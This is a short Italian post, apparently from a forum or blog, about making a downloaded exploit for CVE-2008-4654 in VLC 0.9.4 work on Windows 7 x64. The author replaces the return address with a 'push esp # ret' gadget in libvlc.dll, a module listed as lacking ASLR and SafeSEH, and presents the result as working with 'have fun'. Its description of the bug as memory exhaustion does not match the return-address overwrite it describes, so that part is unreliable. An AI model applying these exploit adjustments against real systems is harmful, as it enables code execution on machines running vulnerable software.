
Un EXP potrebbe essere eseguito su Windows x64 contro CVE-2008-4654.
Beh, è solo una vecchia vulnerabilità il cui numero CVE è CVE-2008-4654. Questa vulnerabilità è causata da un esaurimento della memoria ("Out of Memory") alla riga 1650 di modules/demux/ty.c.
stream_Read(p_demux->s, mst_buf, 8 + i_map_size);
Quando ho scaricato l'EXP da altri siti web, ho scoperto che non funzionava correttamente sul mio Windows 7 Ultimate x64. Quindi ho cambiato l'indirizzo di ritorno da 0x68f0cfad a 0x6a314b52, e ora funziona!
Vecchio:
0x68f0cfad : jmp esp
{PAGE_EXECUTE_READ} [libqt4_plugin.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
Dopo aver scoperto che questo modulo non esiste, ho cambiato in:
0x6a314b52 : push esp # ret
{PAGE_EXECUTE_READ} [libvlc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
Funziona su VLC 0.9.4. Buon divertimento!